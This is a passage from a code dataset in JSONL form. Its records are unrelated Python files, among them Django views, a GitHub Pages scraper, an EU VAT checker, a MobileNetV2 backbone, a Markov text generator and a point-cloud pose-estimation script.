request.POST['image_link']\n\t\t\tif request.POST['description']:\n\t\t\t\tprofile.description = request.POST['description']\n\t\t\tprofile.save()\n\t\t\treturn redirect('/profile/' + request.user.username)\n\telse:\n\t\tform = UserPanelForm()\n\tprint(profile.image_link)\n\tcontext = {\n\t\t'form': form,\n\t\t'myprofile': profile,\n\t}\n\tcontext.update(get_user_context(request.user))\n\treturn render(request, 'profiles/userpanel.html', context)\n\n@login_required(login_url='/login/')\ndef follows(request):\n\tif request.method == \"POST\":\n\t\tfollow_to_delete = Follow.objects.get(pk=request.POST['id'])\n\t\tfollow_to_delete.delete()\n\n\tcontext = get_user_context(request.user)\n\tfollowed_list = Follow.objects.filter(follower=request.user)\n\tfollower_list = Follow.objects.filter(followed=request.user)\n\tfollowed_imgs = []\n\tfollower_imgs = []\n\tfor item in followed_list:\n\t\tfollowed_imgs.append({\n\t\t\t'profile': item,\n\t\t\t'link': Profile.objects.get(user=item.followed).image_link\n\t\t})\n\tfor item in follower_list:\n\t\tfollower_imgs.append({\n\t\t\t'profile': item,\n\t\t\t'link': Profile.objects.get(user=item.follower).image_link\n\t\t})\n\t\tprint(Profile.objects.get(user=item.follower).image_link)\n\tcontext.update({\n\t\t'followed_imgs': followed_imgs,\n\t\t'follower_imgs': follower_imgs,\n\t\t'myprofile': Profile.objects.get(user=request.user)\n\t})\n\n\treturn render(request, 'profiles/follows.html', context)\n\ndef get_user_context(user):\n\tquacks = sorted(Quack.objects.filter(quacker=user), key=lambda quack: quack.created_at, reverse=True)\n\treturn {\n\t\t'profile': user,\n\t\t'quacks': len(quacks),\n\t\t'following': len(Follow.objects.filter(follower=user)),\n\t\t'followers': len(Follow.objects.filter(followed=user)),\n\t\t'quack_list': quacks,\n\t}","sub_path":"application/views/profiles.py","file_name":"profiles.py","file_ext":"py","file_size_in_byte":3037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"381039147","text":"# 如果除了一个数是一个,其余都是两个,那么全部^一遍,剩下的就是那个数\n# 如果如题,有两个数是一个,其余都是两个,那么全部^一遍,剩下的是那两个数\n# 要把这个两个数分开,可以把整个数据集分成分别有这两个数的两部分,可以按照这两个数从最低位起不同的那一位(两数^,和0&为1)分开\n# 分开之后再进行第一步就能分别剩下这两个数\nclass Solution:\n def singleNumbers(self, nums: List[int]) -> List[int]:\n x, y, n, m = 0, 0, 0, 1\n for num in nums: # 1. 遍历异或\n n ^= num\n while n & m == 0: # 2. 循环左移,计算 m\n m <<= 1 \n for num in nums: # 3. 遍历 nums 分组\n if num & m: x ^= num # 4. 当 num & m != 0\n else: y ^= num # 4. 当 num & m == 0\n return x, y # 5. 返回出现一次的数字\n","sub_path":"剑指56-1.py","file_name":"剑指56-1.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"262005803","text":"from random import choice\nfrom datetime import datetime\n\nfrom nonebot import on_notice, get_driver, get_bots\nfrom nonebot_adapter_gocq.bot import Bot\nfrom nonebot_adapter_gocq.event import GroupDecreaseNoticeEvent, GroupIncreaseNoticeEvent\n# from nonebot import get_loaded_plugins\n\nfrom src.common import refresh_gb_dict\nfrom src.common.easy_setting import SUPERUSERS\nfrom src.common.rules import comman_rule\nfrom src.common.log import logger\n\n\n_plugin_name = 'Bot连接提醒'\n\n\ndriver = get_driver()\n\n\n# 上线提醒\n@driver.on_bot_connect\nasync def online_remind(bot: Bot):\n # plugins = get_loaded_plugins()\n # normal_plguins = '\\n'.join(map(lambda x: x.module.plugin_name, filter(lambda obj: hasattr(obj.module, 'plugin_name'), plugins)))\n # manager_pligins = '\\n'.join(map(lambda x: x.module._plugin_name, filter(lambda obj: hasattr(obj.module, '_plugin_name'), plugins)))\n # msg = 'online desu\\n[当前加载的插件]:\\n' + normal_plguins + '\\n[Bot管理插件]:\\n' + manager_pligins\n msg = 'online desu'\n await refresh_gb_dict()\n for sps in SUPERUSERS:\n await bot.send_private_msg(user_id=sps, message=msg)\n\n\n# 掉线提醒\n@driver.on_bot_disconnect\nasync def ofl_rmd(bot: Bot):\n dc_time = datetime.now().time().strftime(\"%H:%M:%S\")\n logger.critical(f'Bot {bot.self_id} disconnected')\n await refresh_gb_dict()\n\n ol_bots = [bt for strid, bt in get_bots().items()]\n if ol_bots:\n while ol_bots:\n notifier : Bot = choice(ol_bots)\n try:\n for su in SUPERUSERS:\n await notifier.send_private_msg(user_id=su, message=f' {bot.self_id} disconnected at {dc_time}')\n break\n except BaseException as err:\n logger.error(f'Bot {notifier.self_id} failed to send offline notification: {err}')\n ol_bots.remove(notifier)\n else:\n logger.error(f'All bots failed to send notification!')\n\n else:\n logger.critical('There is no bot can send notification!')\n\n\n# 被踢提醒\nkicked = on_notice(rule=comman_rule(GroupDecreaseNoticeEvent, sub_type=\"kick_me\"))\n\n@kicked.handle()\nasync def kicked_remind(bot: Bot, event: GroupDecreaseNoticeEvent):\n msg = f'被 {event.operator_id} 踢出群 {event.group_id}'\n logger.info(msg)\n for su in SUPERUSERS:\n await bot.send_private_msg(user_id=su, message=msg)","sub_path":"src/plugins/botmanage/plugins/connect_reminder.py","file_name":"connect_reminder.py","file_ext":"py","file_size_in_byte":2388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"560670655","text":"\"\"\" this is the module level DocString \"\"\"\nimport math\n\ndef sqrt(number):\n \"\"\" This method will calculate sqrt of the given number\n\t Args:\n\t integer number\n\t Returns:\n\t sqrt of the given number\n\t\"\"\"\n return math.sqrt(number)\n\t\nif __name__==\"__main__\":\n print(\"execute 'help(doc_string_demo)' on REPL you will see doc strings\")\n sqrt(9)","sub_path":"common_topics/doc_string_demo.py","file_name":"doc_string_demo.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"220819857","text":"import os\nimport numpy as np\nimport math\nfrom scipy.stats import pearsonr, spearmanr\nfrom sklearn.metrics import (\n matthews_corrcoef,\n f1_score,\n precision_score,\n recall_score,\n classification_report,\n accuracy_score,\n)\n\n\"\"\" Metric Functions \"\"\"\n\n\ndef get_metric_func(metric_name):\n METRIC_MAP = {\n \"acc\": simple_accuracy,\n \"acc_and_f1\": acc_and_f1,\n \"pcc_and_scc\": pearson_and_spearman,\n \"mcc\": mcc,\n }\n return METRIC_MAP[metric_name]\n\n\ndef mcc(labels, preds):\n return {\"mcc\": matthews_corrcoef(labels, preds)}\n\n\ndef simple_accuracy(labels, preds):\n return {\"acc\": accuracy_score(preds, labels)}\n\n\ndef acc_and_f1(labels, preds, average=\"weighted\", target_labels=None):\n f1 = f1_score(y_true=labels, y_pred=preds, average=average, labels=target_labels)\n precision = precision_score(\n y_true=labels, y_pred=preds, average=average, labels=target_labels\n )\n recall = recall_score(\n y_true=labels, y_pred=preds, average=average, labels=target_labels\n )\n metrics_dict = {\n \"f1\": f1,\n \"precision\": precision,\n \"recall\": recall,\n }\n metrics_dict.update(simple_accuracy(labels, preds))\n return metrics_dict\n\n\ndef pearson_and_spearman(labels, preds):\n pearson_corr = pearsonr(preds, labels)[0]\n spearman_corr = spearmanr(preds, labels)[0]\n return {\n \"pearson\": pearson_corr,\n \"spearmanr\": spearman_corr,\n \"corr\": (pearson_corr + spearman_corr) / 2,\n }\n","sub_path":"pymarlin/plugins/hf_seq_classification/metric_utils.py","file_name":"metric_utils.py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"294635839","text":"# alternate method for just scraping i/o sites\nimport requests\nimport glob\nimport time\nimport random\nfrom random import shuffle\nimport os\nimport shutil\nimport re\n\n\n# this is not an exhaustive list of functions, will need to add to/refactor architecture of module depending on how we want to implement file access and reading\n\n#reads in usernames that have been scraped already\ndef readInUsernames():\n usernames = set()\n\n #walk through username directory\n for file in glob.glob(\"./username_data/*.txt\"):\n #print(\"reading \" + str(file))\n with open(file,\"r\") as datafile:\n for user in datafile:\n user = user.replace(\"\\n\",\"\")\n user = user.strip()\n usernames.add(user)\n\n print(\"found \" + str(len(usernames)) + \" usernames from \" + \"/username_data\")\n return usernames\n\ndef getAlreadyScrapedUsers():\n getUsername = re.compile(r'data/(\\S+)\\_(GithubSiteHTML|INVALID)')\n usernames = set()\n #walk through username directory\n for file in glob.glob(\"./github_site_data/*.html\"):\n #if(\"invalid\" not in file.lower()):\n regsearch = getUsername.search(file)\n if(regsearch != None):\n usernames.add(regsearch.group(1))\n #print(\"Foudn \" + str(file.split(\"_\")[0]))\n return usernames\ndef fixFilenames():\n #walk through username directory\n for file in glob.glob(\"./github_site_data/*.html\"):\n\n if(\"\\\\n\" in file or \"\\n\" in file):\n print(r\"\"+file)\n file2 = file.split(\"/\")[2].replace('\\\\n','')\n shutil.move(file,\"./github_site_data/\"+file2)\n\ndef requestIOSite(username):\n headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}\n url = 'https://'+username.strip()+'.github.io'\n print(username)\n print(\"\\t\" + url)\n try:\n response = requests.get(url,headers=headers)\n except requests.exceptions.ConnectionError as e:\n print(\"CONNECTION ERROR...Sleeping 5 minutes\")\n time.sleep(5*60)\n return -1\n if(response.status_code == 200):\n #valid site\n print(\"\\t(res): VALID\")\n return response.text\n \n else:\n print(\"\\t(res): \" + str(response.status_code))\n return False\n\ndef main():\n errorcount =0\n print(\"Scraping data from..\")\n print(os.getcwd())\n userSet = readInUsernames()\n listOfUsernames = getAlreadyScrapedUsers()\n\n\n\n\n print(\"Scraped \" + str(len(listOfUsernames))+ \" of \"+ str(len(userSet)) +\" previously\")\n #gets users in a different order\n #random.shuffe(userSet)\n userSet = random.sample(userSet,len(userSet))\n\n \n #scrapes each user\n scrapecount = 0\n for user in userSet:\n if(user in listOfUsernames):\n continue\n\n scrapecount += 1\n\n #every 20, sleep 30 seconds\n if(scrapecount % 50 == 0):\n time.sleep(30)\n\n time.sleep(random.randint(2,8))\n res = requestIOSite(user)\n if(res == -1):\n errorcount +=1\n if(errorcount > 10):\n print(\"10 connection errors, exiting..\")\n exit(1)\n elif(res!= False):\n #writes html to file\n with open(\"./github_site_data/\"+user+\"_GithubSiteHTML.html\",\"w+\") as outfile:\n outfile.write(res)\n else:\n with open(\"./github_site_data/\"+user+\"_INVALID.html\",\"w+\") as outfile:\n outfile.write(\"no data\")\n\n\n print(\"done\")\nif __name__ == '__main__':\n \n main()\n \n\n","sub_path":"github_scraper/github_site_tools/scrape_githubIO_sites.py","file_name":"scrape_githubIO_sites.py","file_ext":"py","file_size_in_byte":3572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"410021869","text":"from django.utils import timezone\n\nfrom datetime import timedelta\nimport requests\n\nfrom postgresqleu.invoices.models import VatValidationCache\n\n\ndef validate_eu_vat_number(number):\n if VatValidationCache.objects.filter(vatnumber=number, checkedat__gt=timezone.now() - timedelta(days=90)).exists():\n return None\n\n country = number[:2]\n numberonly = number[2:]\n\n try:\n r = requests.post('http://ec.europa.eu/taxation_customs/vies/vatResponse.html', data={\n 'memberStateCode': country,\n 'number': numberonly,\n 'traderName': '',\n 'traderCompanyType': '',\n 'traderStreet': '',\n 'traderPostalCode': '',\n }, timeout=15)\n if 'Yes, valid VAT number' in r.text:\n VatValidationCache(vatnumber=number).save()\n return None\n return \"Invalid VAT number according to validation service\"\n except Exception as e:\n return \"Unable to reach validation service\"\n","sub_path":"postgresqleu/confsponsor/vatutil.py","file_name":"vatutil.py","file_ext":"py","file_size_in_byte":1017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"345502848","text":"import cv2 as cv\nimport numpy as np\nimport g2o\nfrom ch7.triangulation import find_feature_matches, pixel2cam\n\nK = np.array([[520.9, 0, 325.1],\n [0, 521.0, 249.7],\n [0, 0, 1]])\n\n\ndef pose_estimation_3d3d(p_1, p_2):\n q1 = p_1 - np.mean(p_1, axis=0)\n q2 = p_2 - np.mean(p_2, axis=0)\n W = sum([np.matmul(q1i[:, np.newaxis], q2i[:, np.newaxis].transpose()) for q1i, q2i in zip(q1, q2)])\n print('W = \\n', W)\n U, _, V = np.linalg.svd(W)\n if np.linalg.det(U) * np.linalg.det(V) < 0:\n U[:, 2] *= -1\n print('U = \\n', U)\n print('V = \\n', V)\n r_mat = np.matmul(U, V.transpose())\n\n t_vec = np.mean(p_1, axis=0)[:, np.newaxis] - r_mat.dot(np.mean(p_2, axis=0)[:, np.newaxis])\n\n return r_mat, t_vec\n\n\ndef bundle_adjustment(ps_1, ps_2, r_mat, t_vec):\n optimizer = g2o.SparseOptimizer()\n solver = g2o.BlockSolverSim3(g2o.LinearSolverCSparseSim3())\n solver = g2o.OptimizationAlgorithmLevenberg(solver)\n optimizer.set_algorithm(solver)\n\n pose = g2o.VertexSE3Expmap()\n pose.set_estimate(g2o.SE3Quat(np.identity(3), np.zeros((3,))))\n pose.set_id(0)\n optimizer.add_vertex(pose)\n\n index = 1\n for p1, p2 in zip(ps_1, ps_2):\n edge = g2o.EdgeStereoSE3ProjectXYZOnlyPose()\n edge.cam_project(p2)\n edge.set_id(index)\n edge.set_vertex(0, pose)\n edge.set_measurement(p1)\n edge.set_information(np.identity(3))\n optimizer.add_edge(edge)\n index += 1\n\n optimizer.initialize_optimization()\n optimizer.set_verbose(True)\n optimizer.optimize(100)\n print('T = \\n', pose.estimate().matrix())\n\n\nif __name__ == '__main__':\n img_1 = cv.imread('1.png')\n img_2 = cv.imread('2.png')\n key_points_1, key_points_2, matches = find_feature_matches(img_1, img_2)\n print('一共找到了', len(matches), '组匹配点')\n\n depth1 = cv.imread('1_depth.png', -1)\n depth2 = cv.imread('2_depth.png', -1)\n p_3d_1 = []\n p_3d_2 = []\n for m in matches:\n d1 = depth1[int(key_points_1[m.queryIdx].pt[1]), int(key_points_1[m.queryIdx].pt[0])]\n d2 = depth2[int(key_points_2[m.trainIdx].pt[1]), int(key_points_2[m.trainIdx].pt[0])]\n if d1 == 0 or d2 == 0:\n continue\n d1 = d1/5000.0\n d2 = d2/5000.0\n p1 = pixel2cam(key_points_1[m.queryIdx].pt, K)\n p2 = pixel2cam(key_points_2[m.trainIdx].pt, K)\n p_3d_1.append([p1[0, 0]*d1, p1[1, 0]*d1, d1])\n p_3d_2.append([p2[0, 0]*d2, p2[1, 0]*d2, d2])\n\n p_3d_1 = np.array(p_3d_1)\n p_3d_2 = np.array(p_3d_2)\n print(\"3d-2d pairs: \", p_3d_1.shape[0])\n\n R, t = pose_estimation_3d3d(p_3d_1, p_3d_2)\n print('ICP via SVD results: ')\n print('R = \\n', R, '\\nt = \\n', t)\n print('R_inv = \\n', R.transpose(), '\\nt_inv = \\n', -R.transpose().dot(t))\n\n print('calling bundle adjustment')\n bundle_adjustment(p_3d_1, p_3d_2, R, t)\n\n for p1, p2 in zip(p_3d_1[:5, :], p_3d_2[:5, :]):\n print('p1 = ', p1)\n print('p2 = ', p2)\n print('R * p2 + t = ', R.dot(p2[:, np.newaxis]) + t)\n","sub_path":"ch7/pose_estimation_3d3d.py","file_name":"pose_estimation_3d3d.py","file_ext":"py","file_size_in_byte":3043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"215512373","text":"import logging\n\nimport torch.nn as nn\nfrom mmcv.runner import load_checkpoint\n\nfrom ..registry import BACKBONES\n\n\ndef _make_divisible(v, divisor, min_value=None):\n \"\"\"\n This function is taken from the original tf repo.\n It ensures that all layers have a channel number that is divisible by 8\n It can be seen here:\n https://github.com/tensorflow/models/blob/master/research/slim/nets/mobilenet/mobilenet.py\n :param v:\n :param divisor:\n :param min_value:\n :return:\n \"\"\"\n if min_value is None:\n min_value = divisor\n new_v = max(min_value, int(v + divisor / 2) // divisor * divisor)\n # Make sure that round down does not go down by more than 10%.\n if new_v < 0.9 * v:\n new_v += divisor\n return new_v\n\n\nclass ConvBNReLU(nn.Sequential):\n\n def __init__(self,\n in_planes,\n out_planes,\n kernel_size=3,\n stride=1,\n groups=1):\n padding = (kernel_size - 1) // 2\n super(ConvBNReLU, self).__init__(\n nn.Conv2d(\n in_planes,\n out_planes,\n kernel_size,\n stride,\n padding,\n groups=groups,\n bias=False), nn.BatchNorm2d(out_planes),\n nn.ReLU6(inplace=True))\n\n\nclass InvertedResidual(nn.Module):\n\n def __init__(self, inp, oup, stride, expand_ratio):\n super(InvertedResidual, self).__init__()\n self.stride = stride\n assert stride in [1, 2]\n\n hidden_dim = int(round(inp * expand_ratio))\n self.use_res_connect = self.stride == 1 and inp == oup\n\n layers = []\n if expand_ratio != 1:\n # pw\n layers.append(ConvBNReLU(inp, hidden_dim, kernel_size=1))\n layers.extend([\n # dw\n ConvBNReLU(\n hidden_dim, hidden_dim, stride=stride, groups=hidden_dim),\n # pw-linear\n nn.Conv2d(hidden_dim, oup, 1, 1, 0, bias=False),\n nn.BatchNorm2d(oup),\n ])\n self.conv = nn.Sequential(*layers)\n\n def forward(self, x):\n if self.use_res_connect:\n return x + self.conv(x)\n else:\n return self.conv(x)\n\n\n@BACKBONES.register_module\nclass MobileNetV2(nn.Module):\n \"\"\"\n MobileNetV2 is taken from pytorch hub.\n https://github.com/pytorch/vision/blob/master/torchvision/models/mobilenet.py\n \"\"\"\n\n def __init__(self,\n out_indices=(1, 2, 4, 6),\n frozen_stages=-1,\n width_mult=1.0,\n inverted_residual_setting=None,\n round_nearest=8):\n \"\"\"\n MobileNet V2 main class\n Args:\n width_mult (float): Width multiplier - adjusts number of channels\n in each layer by this amount\n inverted_residual_setting: Network structure\n round_nearest (int): Round the number of channels in each layer to\n be a multiple of this number. Set to 1 to turn off rounding\n \"\"\"\n super(MobileNetV2, self).__init__()\n block = InvertedResidual\n input_channel = 32\n\n if inverted_residual_setting is None:\n inverted_residual_setting = [\n # t, c, n, s\n [1, 16, 1, 1], # 0\n [6, 24, 2, 2], # 1\n [6, 32, 3, 2], # 2\n [6, 64, 4, 2], # 3\n [6, 96, 3, 1], # 4\n [6, 160, 3, 2], # 5\n [6, 320, 1, 1], # 6\n ]\n\n # only check the first element,\n # assuming user knows t,c,n,s are required\n if len(inverted_residual_setting) == 0 or len(\n inverted_residual_setting[0]) != 4:\n raise ValueError(\"inverted_residual_setting should be non-empty \"\n \"or a 4-element list, got {}\".format(\n inverted_residual_setting))\n\n self.frozen_stages = frozen_stages\n self.out_indices = out_indices\n assert max(out_indices) < len(inverted_residual_setting)\n # building first layer\n input_channel = _make_divisible(input_channel * width_mult,\n round_nearest)\n self.conv1 = ConvBNReLU(3, input_channel, stride=2)\n # building inverted residual blocks\n self.stages = []\n for si, (t, c, n, s) in enumerate(inverted_residual_setting):\n output_channel = _make_divisible(c * width_mult, round_nearest)\n stage = []\n for i in range(n):\n stride = s if i == 0 else 1\n stage.append(\n block(\n input_channel, output_channel, stride, expand_ratio=t))\n input_channel = output_channel\n stage_name = 'stage{}'.format(si + 1)\n self.add_module(stage_name, nn.Sequential(*stage))\n self.stages.append(stage_name)\n\n self._freeze_stages()\n\n def _freeze_stages(self):\n if self.frozen_stages >= 0:\n self.conv1.eval()\n for param in self.conv1.parameters():\n param.requires_grad = False\n\n for i in range(1, self.frozen_stages + 1):\n m = getattr(self, 'stage{}'.format(i))\n m.eval()\n for param in m.parameters():\n param.requires_grad = False\n\n def init_weights(self, pretrained=None):\n if isinstance(pretrained, str):\n logger = logging.getLogger()\n load_checkpoint(self, pretrained, strict=False, logger=logger)\n elif pretrained is None:\n # weight initialization\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight, mode='fan_out')\n if m.bias is not None:\n nn.init.zeros_(m.bias)\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.ones_(m.weight)\n nn.init.zeros_(m.bias)\n else:\n raise TypeError('pretrained must be a str or None')\n\n def forward(self, x):\n x = self.conv1(x)\n outs = []\n for i, stage_name in enumerate(self.stages):\n stage = getattr(self, stage_name)\n x = stage(x)\n if i in self.out_indices:\n outs.append(x)\n return tuple(outs)","sub_path":"mmdet/models/backbones/mobilenet.py","file_name":"mobilenet.py","file_ext":"py","file_size_in_byte":6411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"335754820","text":"##Esse script atua como módulo para ccu_over_time_plot\r\n\r\nimport pandas\r\n\r\ndf = pandas.read_csv(\"C:/Users/Usuario/Documents/Visual Studio Code/dashboard/steam_data/top_games_by_ccu - Copy.csv\")\r\n\r\ndef plot_data(games, date):\r\n boolean = [x[:10] == date for x in df.Hora] #lista de booleano usado para filtrar o df pela data\r\n results_by_date = df[boolean]\r\n results_by_date.reset_index(drop = True, inplace = True) #resetando os indexes\r\n\r\n for i in range(len(results_by_date)):\r\n hours = int(results_by_date.Hora[i][-5: -3]) #hora em inteiro(horas e minutos são extraídos por string slicing)\r\n minutes = int(results_by_date.Hora[i][-2:]) #análogo\r\n minutes_in_hours = round(minutes/60, 3) #convertendo os minutos em horas e arredondando para 3 casas decimais\r\n results_by_date.Hora[i] = hours + minutes_in_hours\r\n \r\n results_by_date_and_name = [] #lista de dataframes, cada elemento é um dataframe relativo a um dos jogos\r\n for game in games:\r\n data = results_by_date.loc[lambda x : x.Nome == game]\r\n results_by_date_and_name.append(data)\r\n\r\n return pandas.concat(results_by_date_and_name)\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"steam_data/ccu_over_time.py","file_name":"ccu_over_time.py","file_ext":"py","file_size_in_byte":1177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"117239759","text":"\"\"\"A Markov chain generator that can tweet random messages.\"\"\"\n\nimport sys\nfrom random import choice\nimport os\nimport discord\ndef open_and_read_file(file_path):\n \"\"\"Take file path as string; return text as string.\n\n Takes a string that is a file path, opens the file, and turns\n the file's contents as one string of text.\n \"\"\"\n\n # your code goes here\n\n return open(file_path).read()\n\n\ndef make_chains(text_string, gram_num):\n \"\"\"Take input text as string; return dictionary of Markov chains.\n\n A chain will be a key that consists of a tuple of (word1, word2)\n and the value would be a list of the word(s) that follow those two\n words in the input text.\n\n For example:\n\n >>> chains = make_chains(\"hi there mary hi there juanita\")\n\n Each bigram (except the last) will be a key in chains:\n\n >>> sorted(chains.keys())\n [('hi', 'there'), ('mary', 'hi'), ('there', 'mary')]\n\n Each item in chains is a list of all possible following words:\n\n >>> chains[('hi', 'there')]\n ['mary', 'juanita']\n \n >>> chains[('there','juanita')]\n [None]\n \"\"\"\n\n words = text_string.split()\n chains = {}\n\n for index in range(len(words) - gram_num):\n #to account for unknown number of words making up chain\n #use list slicing to grab n number of words\n #convert that list slice back into a tuple\n ngram = tuple(words[index:gram_num + index])\n #the next work after n words will be the index + n\n following_word = words[index + gram_num]\n \n #try to append, if key does not yet exist set an empty list first\n chains.setdefault(ngram, []).append(following_word)\n\n # if word_pair in chains:\n # chains[word_pair].append(following_word)\n # else:\n # chains[word_pair] = [following_word] \n\n return chains\n\n\ndef make_text(chains):\n \"\"\"Return text from chains.\"\"\"\n\n words = []\n\n #generating a list of valid starting tuples\n #in this case, only tuples with capitalized first words\n starting_tuples = [word_tup for word_tup in chains\n if word_tup[0][0].isupper()]\n\n ngram = choice(starting_tuples)\n\n words.extend(ngram)\n\n word_limit = 100\n\n while ngram in chains:\n\n next_word = choice(chains[ngram])\n words.append(next_word)\n\n #to build the next gram for an unknown length of chain\n #use list slicing to cut out first word in tuple\n end_of_gram = list(ngram)[1:]\n\n #add on my following word\n end_of_gram.append(next_word)\n\n #convert that list back into a tuple to match keys in dictionary\n ngram = tuple(end_of_gram)\n\n if len(words) > word_limit:\n break\n\n return \" \".join(words)\n\n\ninput_path = sys.argv[1]\n\n# Open the file and turn it into one long string\ninput_text = open_and_read_file(input_path)\n\n# Get a Markov chain\nchains = make_chains(input_text, 2)\n\n# Produce random text\nrandom_text = make_text(chains)\n\nprint(random_text)\n\n# #adding in discord posting functionality\n# client = discord.Client()\n\n\n# @client.event\n# async def on_ready():\n# print(f'Successfully connected! Logged in as {client.user}.')\n\n\n# @client.event\n# async def on_message(message):\n# if message.author == client.user:\n# return\n\n# if client.user in message.mentions:\n# await message.channel.send(random_text)\n\n\n# client.run(os.environ['DISCORD_TOKEN'])\n","sub_path":"markov.py","file_name":"markov.py","file_ext":"py","file_size_in_byte":3466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"263283147","text":"from sklearn.svm import LinearSVC\n\nfrom utils.hyperparameters import HyperParameters\nfrom .traditional_model import TraditionalModel\n\n\nclass LinearSVMModel(TraditionalModel):\n\n def __init__(self, hyper_parameters: HyperParameters, save_folder: str, is_train: bool):\n super().__init__(hyper_parameters, save_folder, is_train)\n\n self._model = None\n self.name = 'linear-svm'\n\n def make(self, is_train: bool, is_frozen: bool):\n if self.model is not None:\n return\n\n self._model = LinearSVC(penalty=self.hypers.model_params['penalty'],\n C=self.hypers.model_params['regularization_strength'],\n dual=False,\n max_iter=self.hypers.model_params['max_iters'])\n","sub_path":"src/models/linear_svm.py","file_name":"linear_svm.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"223475925","text":"import os\nfrom typing import List, Union, Tuple\n\nimport cv2\nimport numpy as np\nimport torch\nfrom torchvision.datasets import DatasetFolder\nfrom torchvision.transforms import ToPILImage, Compose, ToTensor\n\nimport config\nfrom utils import split_path\n\ndef make_dataset(root: str, files: List) -> List[str]:\n images = []\n\n for image in sorted(files):\n path = os.path.join(root, image)\n images.append(path)\n\n return images\n\n\nclass ImageLoader(DatasetFolder):\n def __init__(self,\n root_path: str,\n image_size: Tuple[int, int, int],\n transform: Compose = None,\n training: bool = True,\n crops: Tuple[Tuple[int, int], Tuple[int, int]] = ((0, 384), (0, 384))):\n\n super(DatasetFolder, self).__init__(root_path, transform=transform, target_transform=None)\n\n if image_size[0] == 1:\n phase = False\n else:\n phase = True\n\n folders = set()\n\n input_images_amp = {}\n input_images_phase = {}\n reference_images_amp = {}\n reference_images_phase = {}\n\n for root, dirs, files in os.walk(root_path):\n if config.INPUT_FOLDER_NAME in root and config.AMP_FOLDER_NAME in root:\n folder_name = split_path(root)[-3]\n folders.add(folder_name)\n input_images_amp[folder_name] = make_dataset(root, files)\n if config.INPUT_FOLDER_NAME in root and config.PHASE_FOLDER_NAME in root and phase:\n folder_name = split_path(root)[-3]\n folders.add(folder_name)\n input_images_phase[folder_name] = make_dataset(root, files)\n if config.REFERENCE_FOLDER_NAME in root and config.AMP_FOLDER_NAME in root and training:\n folder_name = split_path(root)[-3]\n folders.add(folder_name)\n reference_images_amp[folder_name] = make_dataset(root, files)\n if config.REFERENCE_FOLDER_NAME in root and config.PHASE_FOLDER_NAME in root and phase and training:\n folder_name = split_path(root)[-3]\n folders.add(folder_name)\n reference_images_phase[folder_name] = make_dataset(root, files)\n\n self.input_images_amp = []\n self.input_images_phase = []\n self.reference_images_amp = []\n self.reference_images_phase = []\n\n for i in folders:\n self.input_images_amp.extend(input_images_amp[i])\n if phase:\n try:\n self.input_images_phase.extend(input_images_phase[i])\n except KeyError:\n print(f'Could not find input phase folder for {i} although phase was required')\n\n if training:\n assert (len(input_images_amp[i]) == len(reference_images_amp[i])), f'Not the same amount of input ' \\\n f'and ' \\\n f'reference images in amp folder ' \\\n f'{i}!'\n try:\n self.reference_images_amp.extend(reference_images_amp[i])\n except KeyError:\n print(f'Error, loader in training mode requires a reference folder for every input folder ({i})!')\n if phase:\n assert (len(input_images_phase[i]) == len(reference_images_phase[i])), f'Not the same amount of ' \\\n f'input and reference ' \\\n f'images in phase folder ' \\\n f'{i}! '\n try:\n self.reference_images_phase.extend(reference_images_phase[i])\n except KeyError:\n print(f'Could not find reference phase folder for {i} although phase was required')\n\n self.phase = phase\n self.image_size = (image_size[1], image_size[2])\n self.training = training\n self.crops = crops\n self.val = False\n\n def _get_image(self, index: int, is_input: bool) -> np.ndarray:\n if is_input:\n amp_path = self.input_images_amp[index]\n if self.phase:\n phase_path = self.input_images_phase[index]\n else:\n amp_path = self.reference_images_amp[index]\n if self.phase:\n phase_path = self.reference_images_phase[index]\n amp = cv2.imread(amp_path, cv2.IMREAD_GRAYSCALE)\n\n if self.phase:\n phase = cv2.imread(phase_path, cv2.IMREAD_GRAYSCALE)\n amp_and_phase = np.stack([amp, phase])\n final_image = amp_and_phase\n else:\n final_image = amp\n\n return final_image\n\n def __getitem__(self, item: int) -> Union[torch.Tensor, Tuple[torch.Tensor, torch.Tensor]]:\n input_image = self._get_image(item, True)\n if input_image is None:\n print(self.input_images_amp[item])\n if self.training:\n reference_image = self._get_image(item, False)\n if self.phase:\n if input_image.shape[1] != reference_image.shape[1]:\n input_image = input_image[:, input_image.shape[1] - reference_image.shape[1]:]\n combined = np.concatenate((input_image, reference_image), axis=0)\n else:\n combined = np.array([input_image, reference_image])\n if combined.shape[1] == self.image_size[0]:\n crop_x_lower = 0\n else:\n crop_x_lower = np.random.randint(0, combined.shape[1] - self.image_size[0])\n crop_x_upper = crop_x_lower + self.image_size[0]\n if combined.shape[2] == self.image_size[1]:\n crop_y_lower = 0\n else:\n crop_y_lower = np.random.randint(0, combined.shape[2] - self.image_size[1])\n crop_y_upper = crop_y_lower + self.image_size[1]\n if self.val:\n if input_image.shape[2] != 301:\n lower = int((input_image.shape[2] - 301) / 2)\n 